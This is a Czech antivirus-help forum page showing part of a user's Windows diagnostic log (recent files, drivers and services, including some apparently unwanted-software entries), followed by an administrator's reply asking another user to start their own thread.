2017-07-12 04:14:14 ----A---- C:\Windows\system32\smbwmiv2.dll
2017-07-12 04:14:14 ----A---- C:\Windows\system32\ExplorerFrame.dll
2017-07-12 04:14:14 ----A---- C:\Windows\system32\drivers\srvnet.sys
2017-07-12 04:14:14 ----A---- C:\Windows\system32\drivers\srv.sys
2017-07-12 04:14:13 ----A---- C:\Windows\SYSWOW64\Wldap32.dll
2017-07-12 04:14:13 ----A---- C:\Windows\SYSWOW64\uudf.dll
2017-07-12 04:14:13 ----A---- C:\Windows\SYSWOW64\ifsutil.dll
2017-07-12 04:14:13 ----A---- C:\Windows\SYSWOW64\ExplorerFrame.dll
2017-07-12 04:14:13 ----A---- C:\Windows\system32\wvc.dll
2017-07-12 04:14:13 ----A---- C:\Windows\system32\uudf.dll
2017-07-12 04:14:13 ----A---- C:\Windows\system32\ifsutil.dll
2017-07-12 04:14:13 ----A---- C:\Windows\system32\drivers\storport.sys
2017-07-12 04:14:13 ----A---- C:\Windows\system32\DAFWSD.dll
2017-07-12 04:14:12 ----AC---- C:\Windows\system32\drivers\stornvme.sys
2017-07-12 04:14:12 ----A---- C:\Windows\system32\WSDApi.dll
2017-07-12 04:14:12 ----A---- C:\Windows\system32\Wldap32.dll
2017-07-12 04:14:12 ----A---- C:\Windows\system32\wdc.dll
2017-07-12 04:14:12 ----A---- C:\Windows\system32\msinfo32.exe
2017-07-12 04:14:12 ----A---- C:\Windows\system32\drivers\srv2.sys
2017-07-12 04:14:12 ----A---- C:\Windows\system32\drivers\pdc.sys
2017-07-12 04:14:11 ----A---- C:\Windows\SYSWOW64\wsdchngr.dll
2017-07-12 04:14:11 ----A---- C:\Windows\SYSWOW64\WSDApi.dll
2017-07-12 04:14:11 ----A---- C:\Windows\SYSWOW64\wininet.dll
2017-07-12 04:14:11 ----A---- C:\Windows\SYSWOW64\wdc.dll
2017-07-12 04:14:11 ----A---- C:\Windows\SYSWOW64\ulib.dll
2017-07-12 04:14:11 ----A---- C:\Windows\system32\wsdchngr.dll
2017-07-12 04:14:11 ----A---- C:\Windows\system32\ulib.dll
2017-07-12 04:14:11 ----A---- C:\Windows\system32\uexfat.dll
2017-07-12 04:14:11 ----A---- C:\Windows\system32\jscript.dll
2017-07-12 04:14:11 ----A---- C:\Windows\system32\drivers\netio.sys
2017-07-12 04:14:11 ----A---- C:\Windows\system32\cnvfat.dll
2017-07-12 04:14:10 ----A---- C:\Windows\SYSWOW64\ufat.dll
2017-07-12 04:14:10 ----A---- C:\Windows\SYSWOW64\uexfat.dll
2017-07-12 04:14:10 ----A---- C:\Windows\SYSWOW64\msinfo32.exe
2017-07-12 04:14:10 ----A---- C:\Windows\system32\ufat.dll
2017-07-12 04:14:10 ----A---- C:\Windows\system32\sscore.dll
2017-07-12 04:14:10 ----A---- C:\Windows\system32\rdsdwmdr.dll
2017-07-12 04:14:09 ----A---- C:\Windows\SYSWOW64\wvc.dll
2017-07-12 04:14:09 ----A---- C:\Windows\SYSWOW64\sscore.dll
2017-07-12 04:14:08 ----A---- C:\Windows\SYSWOW64\msfeeds.dll
2017-07-12 04:14:08 ----A---- C:\Windows\SYSWOW64\cnvfat.dll
2017-07-12 04:14:08 ----A---- C:\Windows\system32\snmptrap.exe
2017-07-12 04:14:08 ----A---- C:\Windows\system32\msfeeds.dll
2017-07-12 04:14:08 ----A---- C:\Windows\system32\inetcomm.dll
2017-07-12 04:14:08 ----A---- C:\Windows\system32\convert.exe
2017-07-12 04:14:07 ----A---- C:\Windows\SYSWOW64\Windows.Data.Pdf.dll
2017-07-12 04:14:07 ----A---- C:\Windows\SYSWOW64\inetcomm.dll
2017-07-12 04:14:07 ----A---- C:\Windows\SYSWOW64\glcndFilter.dll
2017-07-12 04:14:07 ----A---- C:\Windows\system32\Windows.Data.Pdf.dll
2017-07-12 04:14:07 ----A---- C:\Windows\system32\glcndFilter.dll
2017-07-12 04:14:06 ----A---- C:\Windows\SYSWOW64\jscript.dll
2017-07-12 04:14:06 ----A---- C:\Windows\SYSWOW64\ieapfltr.dll
2017-07-12 04:14:06 ----A---- C:\Windows\system32\ieapfltr.dll
2017-07-12 04:07:39 ----A---- C:\Windows\system32\appraiser.dll
2017-07-12 04:07:39 ----A---- C:\Windows\system32\aepic.dll
2017-07-12 04:07:38 ----A---- C:\Windows\system32\invagent.dll
2017-07-12 04:07:38 ----A---- C:\Windows\system32\generaltel.dll
2017-07-12 04:07:38 ----A---- C:\Windows\system32\devinv.dll
2017-07-12 04:07:38 ----A---- C:\Windows\system32\CompatTelRunner.exe
2017-07-12 04:07:38 ----A---- C:\Windows\system32\centel.dll
2017-07-12 04:07:38 ----A---- C:\Windows\system32\aeinv.dll
2017-07-12 04:07:38 ----A---- C:\Windows\system32\acmigration.dll
2017-07-04 09:32:39 ----A---- C:\Windows\system32\aswBoot.exe
2017-07-02 19:36:35 ----D---- C:\Users\GIGABYTE\AppData\Roaming\discordsdk
2017-07-02 19:35:48 ----A---- C:\Windows\NGService.exe
2017-06-28 15:44:49 ----D---- C:\ProgramData\Gibraltar

====== List of files/folders modified in the last 1 month ======

2017-07-22 19:33:10 ----D---- C:\Windows\Prefetch
2017-07-22 19:33:04 ----RD---- C:\Program Files
2017-07-22 19:32:59 ----D---- C:\Windows\Temp
2017-07-22 19:31:42 ----D---- C:\Users\GIGABYTE\AppData\Roaming\uTorrent
2017-07-22 19:00:00 ----D---- C:\Windows\system32\sru
2017-07-22 17:45:38 ----D---- C:\Windows\Microsoft.NET
2017-07-22 09:52:19 ----D---- C:\Windows\system32\drivers
2017-07-21 19:24:45 ----D---- C:\Users\GIGABYTE\AppData\Roaming\ClassicShell
2017-07-21 09:51:33 ----HD---- C:\Program Files\WindowsApps
2017-07-21 09:51:33 ----D---- C:\Windows\AppReadiness
2017-07-19 12:36:04 ----D---- C:\Windows\system32\config
2017-07-19 12:02:42 ----D---- C:\Windows\system32\DriverStore
2017-07-18 10:05:04 ----AHD---- C:\ProgramData
2017-07-18 09:52:27 ----D---- C:\Windows\System32
2017-07-18 09:43:13 ----D---- C:\Windows\Inf
2017-07-18 09:42:26 ----D---- C:\ProgramData\NVIDIA Corporation
2017-07-18 09:41:42 ----D---- C:\Windows\SysWOW64
2017-07-18 09:41:42 ----D---- C:\Program Files\NVIDIA Corporation
2017-07-18 09:41:41 ----D---- C:\Program Files (x86)\NVIDIA Corporation
2017-07-18 09:40:03 ----D---- C:\Windows
2017-07-18 09:39:25 ----D---- C:\Windows\Help
2017-07-18 09:23:45 ----SHD---- C:\Windows\Installer
2017-07-18 09:23:44 ----D---- C:\Program Files (x86)
2017-07-18 09:23:24 ----SHD---- C:\System Volume Information
2017-07-16 08:54:21 ----D---- C:\Windows\rescache
2017-07-15 13:50:03 ----D---- C:\Windows\system32\NDF
2017-07-12 12:16:04 ----D---- C:\Windows\system32\Macromed
2017-07-12 12:16:03 ----D---- C:\Windows\SYSWOW64\Macromed
2017-07-12 09:13:47 ----SHD---- C:\Boot
2017-07-12 09:13:47 ----D---- C:\Windows\WinSxS
2017-07-12 08:17:58 ----D---- C:\Windows\system32\wbem
2017-07-12 08:17:58 ----D---- C:\Windows\system32\drivers\en-US
2017-07-12 08:17:58 ----D---- C:\Windows\system32\drivers\cs-CZ
2017-07-12 08:17:58 ----D---- C:\Windows\system32\appraiser
2017-07-12 05:14:00 ----AC---- C:\Windows\system32\MRT.exe
2017-07-12 05:13:53 ----D---- C:\ProgramData\Microsoft Help
2017-07-12 05:13:41 ----D---- C:\Windows\CbsTemp
2017-07-12 04:05:56 ----D---- C:\Windows\system32\catroot2
2017-07-11 21:36:27 ----D---- C:\Users\GIGABYTE\AppData\Roaming\.minecraft
2017-07-08 12:28:19 ----A---- C:\Windows\system32\PerfStringBackup.INI
2017-07-06 20:06:52 ----D---- C:\Program Files\Mozilla Firefox
2017-07-06 20:06:38 ----D---- C:\Program Files (x86)\Mozilla Firefox
2017-07-06 14:42:05 ----D---- C:\Windows\system32\Tasks
2017-07-06 14:41:45 ----D---- C:\Program Files (x86)\McAfee
2017-07-06 14:40:04 ----D---- C:\Program Files\TrueKey
2017-07-05 08:27:02 ----D---- C:\ProgramData\McAfee
2017-07-04 09:32:32 ----D---- C:\ProgramData\AVAST Software
2017-07-02 08:34:14 ----SD---- C:\Users\GIGABYTE\AppData\Roaming\Microsoft
2017-06-30 02:27:57 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2017-06-29 15:14:12 ----D---- C:\Users\GIGABYTE\AppData\Roaming\vlc
2017-06-28 17:24:12 ----D---- C:\ProgramData\Bohemia Interactive
2017-06-23 04:05:40 ----D---- C:\ProgramData\MEGAsync

File C:\Windows\system32\winlogon.exe is digitally signed
File C:\Windows\system32\wininit.exe is digitally signed
File C:\Windows\explorer.exe is digitally signed
File C:\Windows\SysWOW64\explorer.exe is digitally signed
File C:\Windows\system32\svchost.exe is digitally signed
File C:\Windows\SysWOW64\svchost.exe is digitally signed
File C:\Windows\system32\services.exe is digitally signed
File C:\Windows\system32\User32.dll is digitally signed
File C:\Windows\SysWOW64\User32.dll is digitally signed
File C:\Windows\system32\userinit.exe is digitally signed
File C:\Windows\SysWOW64\userinit.exe is digitally signed
File C:\Windows\system32\rpcss.dll is digitally signed
File C:\Windows\system32\Drivers\volsnap.sys is digitally signed

====== List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2017-07-04 198944]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2017-07-04 343264]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2017-07-04 57704]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2017-07-04 84392]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2017-07-04 361336]
R0 iaStorA;iaStorA; C:\Windows\System32\drivers\iaStorA.sys [2013-08-07 644968]
R0 sptd;sptd; C:\Windows\System32\Drivers\sptd.sys [2015-11-07 381608]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2017-07-04 319984]
R1 aswKbd;aswKbd; C:\Windows\system32\drivers\aswKbd.sys [2017-07-04 41800]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2017-07-04 110352]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2017-07-04 1015848]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2017-07-04 585608]
R1 dtsoftbus01;@oem33.inf,%DTSoftBus.SVCDESC%;DAEMON Tools Virtual Bus Driver; C:\Windows\System32\drivers\dtsoftbus01.sys [2017-05-28 254528]
R1 ElbyCDIO;ElbyCDIO Driver; C:\Windows\System32\Drivers\ElbyCDIO.sys [2014-12-21 40344]
R1 iSafeNetFilter;YAC NDIS Driver; C:\Windows\system32\DRIVERS\iSafeNetFilter.sys [2016-05-19 52392]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2017-07-18 146696]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2017-07-04 198768]
R2 atksgt;atksgt; C:\Windows\system32\DRIVERS\atksgt.sys [2015-05-09 312480]
R2 lirsgt;lirsgt; C:\Windows\system32\DRIVERS\lirsgt.sys [2015-05-09 43168]
R3 athur;@oem25.inf,%ATHR.Service.DispName%;Qualcomm Atheros AR9271 Wireless Network Adapter Service; C:\Windows\system32\DRIVERS\athuw8x.sys [2013-06-02 2919936]
R3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [2015-03-31 4877240]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys [2013-10-29 3698904]
R3 iwdbus;@oem15.inf,%iwdbus.SVCDESC%;IWD Bus Enumerator; C:\Windows\System32\drivers\iwdbus.sys [2015-02-10 30512]
R3 MEIx64;@oem11.inf,%TEE_SvcDesc%;Intel(R) Management Engine Interface ; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [2013-09-16 99288]
R3 NVHDA;@oem43.inf,%NVHDA.SvcDesc%;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys [2017-05-19 226712]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2017-05-19 14278736]
R3 NvStreamKms;NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-07-24 19600]
R3 nvvad_WaveExtensible;@oem46.inf,%nvvad_WaveExtensible.SvcDesc%;NVIDIA Virtual Audio Device (Wave Extensible) (WDM); C:\Windows\system32\drivers\nvvad64v.sys [2015-07-03 47976]
R3 RTL8168;@oem16.inf,%rtl8168.Service.DispName%;Realtek 8168 NT Driver; C:\Windows\system32\DRIVERS\Rt630x64.sys [2013-09-09 833752]
R3 tap0901;@oem26.inf,%DeviceDescription%;TAP-Windows Adapter V9; C:\Windows\system32\DRIVERS\tap0901.sys [2013-08-22 40664]
R3 VClone;VClone; C:\Windows\System32\drivers\VClone.sys [2014-05-03 34816]
S1 saygxpdw;saygxpdw; \??\C:\Windows\system32\drivers\saygxpdw.sys []
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2017-07-04 46984]
S3 BRDriver64_1_3_3_E02B25FC;BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [2016-11-09 78088]
S3 dg_ssudbus;@oem37.inf,%ssud.Service.DeviceDesc%;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudbus.sys [2016-04-25 129152]
S3 dtlitescsibus;@oem36.inf,%DTLITESCSIBUS.DeviceDesc%;DAEMON Tools Lite Virtual SCSI Bus; C:\Windows\System32\drivers\dtlitescsibus.sys [2015-06-07 30264]
S3 dtproscsibus;@oem35.inf,%DTPROSCSIBUS.DeviceDesc%;DAEMON Tools Pro Virtual SCSI Bus; C:\Windows\System32\drivers\dtproscsibus.sys [2015-11-07 30264]
S3 dtscsidrv;dtscsidrv; C:\Windows\system32\drivers\dtscsidrv.sys [2015-12-30 309248]
S3 gdrv;gdrv; \??\C:\Windows\gdrv.sys []
S3 intaud_WaveExtensible;@oem14.inf,%INTAUD_WEX.SvcDesc%;Intel WiDi Audio Device; C:\Windows\system32\drivers\intelaud.sys [2015-02-10 42288]
S3 IntcDAud;@oem12.inf,%IntcDAud.SvcDesc%;Intel(R) Display Audio; C:\Windows\system32\DRIVERS\IntcDAud.sys [2013-09-17 449528]
S3 iSafeKrnlBoot;YAC Boot Driver; C:\Windows\system32\DRIVERS\iSafeKrnlBoot.sys [2016-05-23 55056]
S3 ssudmdm;@oem38.inf,%ssud.Service.Name%;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudmdm.sys [2016-04-25 221824]
S3 VBoxDrv;VBoxDrv; \??\C:\Windows\system32\drivers\VBoxDrv.sys [2017-04-06 68288]

====== List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2017-04-25 83056]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2017-07-04 263312]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; %SystemRoot%\System32\svchost.exe -k utcsvc;"ServiceDll" = %SystemRoot%\system32\diagtrack.dll
R2 ed2kidle;ed2k idle service; C:\Program Files (x86)\amuleC\ed2k.exe [2016-10-08 237568]
R2 GfExperienceService;NVIDIA GeForce Experience Service; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [2015-07-24 1155216]
R2 GubedZL;GubedZL; C:\Windows\SysWOW64\svchost.exe [2014-10-29 33088]
R2 HiPatchService;Hi-Rez Studios Authenticate and Update Service; D:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [2017-02-24 9728]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-08-07 15720]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service; C:\Windows\system32\igfxCUIService.exe [2015-03-31 344976]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [2013-08-27 747520]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [2013-09-16 169432]
R2 LMS;Intel(R) Management and Security Application Local Management Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe [2013-09-16 390616]
R2 NvNetworkService;NVIDIA Network Service; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2015-07-24 1871504]
R2 NvStreamSvc;NVIDIA Streamer Service; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2015-07-24 5544592]
R2 nvsvc;NVIDIA Display Driver Service; C:\Windows\system32\nvvsvc.exe [2015-07-23 937616]
R2 PnkBstrA;PnkBstrA; C:\Windows\syswow64\PnkBstrA.exe [2017-04-02 75136]
R2 ssinstall;SInstalátor; C:\Windows\SysWOW64\ssins.exe [2016-12-15 4696960]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service; C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-07-23 410952]
R2 TrueKey;Intel Security True Key; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [2017-06-26 1001920]
R2 TrueKeyScheduler;Intel Security True Key Scheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [2017-06-26 16928]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2017-07-04 7430992]
R3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2013-08-03 43696]
S2 AMD;AMD; C:\Users\GIGABYTE\AppData\Local\AMD\amd.exe [2017-04-09 120320]
S2 DeskTop_F;DeskTop DispalyName; C:\ProgramData\desktopfind\desktop244.exe [2016-03-16 236728]
S2 FirefoxU;Update Service(FirefoxU); C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [2017-01-23 160432]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-11 144200]
S2 iedvutils;ExplorerService; C:\Program Files (x86)\Explorer\iedvutils.exe []
S2 InstallerService;Service Installer TrueKey; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe []
S2 Service Mgr DragonBranch;Service Mgr DragonBranch; C:\ProgramData\b56dff5a-df23-4e43-acde-a4f08b8dcffb\plugincontainer.exe []
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-12 272384]
S3 ArcService;Arc Service; D:\ArcService.exe []
S3 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2013-08-17 31904]
S3 BEService;BattlEye Service; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [2017-06-28 1536520]
S3 BRSptStub;BitRaider Mini-Support Service Stub Loader; C:\ProgramData\BitRaider\BRSptStub.exe [2016-11-09 363208]
S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; %SystemRoot%\System32\svchost.exe -k LocalServiceAndNoImpersonation;"ServiceDll" = %SystemRoot%\System32\BthHFSrv.dll
S3 cphs;Intel(R) Content Protection HECI Service; C:\Windows\SysWow64\IntelCpHeciSvc.exe [2015-03-31 279952]
S3 EasyAntiCheat;EasyAntiCheat; C:\Windows\syswow64\EasyAntiCheat.exe [2017-06-22 382504]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-11 144200]
S3 HnGSteamService;Heroes & Generals Steam Service; D:\Steam\steamapps\common\Heroes & Generals\hngservice.exe [2017-07-20 722216]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-04 69632]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2013-08-27 828376]
S3 iThemes5;iThemes5; rundll32 C:\Program Files (x86)\Common Files\Services\iThemes.dll,fnde_svr []
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2016-12-16 172488]
S3 NGS;Nexon Game Security Service; C:\Windows\NGService.exe [2017-07-02 2466888]
S3 npggsvc;nProtect GameGuard Service; C:\Windows\syswow64\GameMon.des [2016-08-16 5660512]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 174440]
S3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
S3 Steam Client Service;Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [2017-07-18 1608480]
S3 TrueKeyServiceHelper;Intel Security True Key Helper Service; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [2017-06-26 87760]

-----------------EOF-----------------

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#14 Příspěvek od Rudy »

2Nerzy23: Založte si, prosím, vlastní topic. Děkujeme.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Zamčeno